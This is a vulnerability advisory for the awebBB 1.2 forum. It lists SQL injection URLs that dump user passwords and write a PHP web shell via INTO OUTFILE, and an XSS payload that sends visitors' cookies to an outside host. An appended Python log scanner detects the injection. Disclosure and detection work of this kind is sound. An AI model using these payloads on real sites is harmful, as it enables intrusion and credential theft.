awebBB 1.2 Vuln

2006-04-10T00:00:00
ID SECURITYVULNS:DOC:12115
Type securityvulns
Reporter Securityvulns
Modified 2006-04-10T00:00:00

Description

  1. SQL Injection

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*

If magic_quotes_gpc is off:

/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,'<?%20passthru($_GET[cmd])%20?>',0,0,0,0,0%20from%20users%20INTO%20OUTFILE%20'/PATH/shell.php'/*

AND

/shell.php?cmd=ls
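
Added example, not part of the original advisory: a web-server log check for the rowstart injection shown above. It assumes a legitimate rowstart is a plain non-negative integer and that requests are logged in common log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate rowstart value is a plain non-negative integer.
NUMERIC = re.compile(r"\d+")
# SQL keywords that appear in the advisory's request strings.
MARKERS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "into-outfile": re.compile(r"\binto\s+outfile\b", re.I),
}
# Request field of a common-log-format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_rowstart(value):
    """Return the findings for one percent-decoded rowstart value."""
    if NUMERIC.fullmatch(value):
        return []
    findings = ["non-numeric"]
    findings += [name for name, rx in MARKERS.items() if rx.search(value)]
    return findings

def scan(lines):
    """Return [(line_number, findings)] for suspicious search.php requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/search.php"):
            continue
        # parse_qs percent-decodes each value before it is classified
        for value in parse_qs(url.query).get("rowstart", []):
            findings = classify_rowstart(value)
            if findings:
                hits.append((n, findings))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '192.0.2.10 - - [10/Apr/2006:15:20:01 +0000] "GET /search.php?a=1&q=as&rowstart=20 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Apr/2006:15:21:17 +0000] "GET /search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/* HTTP/1.1" 200 4811',
    '192.0.2.44 - - [10/Apr/2006:15:22:03 +0000] "GET /search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,0,0,0,0,0%20INTO%20OUTFILE%20%27/PATH/x.php%27/* HTTP/1.1" 200 4790',
    '192.0.2.10 - - [10/Apr/2006:15:23:40 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The same integer-only rule applied to rowstart inside search.php before it reaches the query is the corresponding fix.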

  2. Cross Site Scripting

/ndis.php

Insufficient checking of fpost.

<div class="blue-box"><div class="breaker"><a id="id"></a><b>Re:Re:Re:test</b> by <a href="dpost.php?p=test">test</a></div><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td height="80" width="80" rowspan="2"><img src="images/af.jpg" border="0" align="left" width="80" height="80"></td><td valign="top"><div class="breaker"><script>document.write("<img src='http://bug/xss.php?c="+ document.cookie +"'style=visibility:hidden;'>");</script></div></td></tr><tr><td valign="bottom"><div align="right"><i>Love Life</i><br>15:24:04 - 2006-04-08</div></td></tr></table><div class="breaker"></div><div id="masterdiv12"><div class="menutitle" onclick="SwitchPlanet('sub12')">&nbsp~ <a href="#12">Reply</a></div><span class="submenu12" id="sub12">

http://www.securitylab.ru/forum/read.php?FID=16&TID=23108


Email: kevrter@netw.ru ICQ: 294308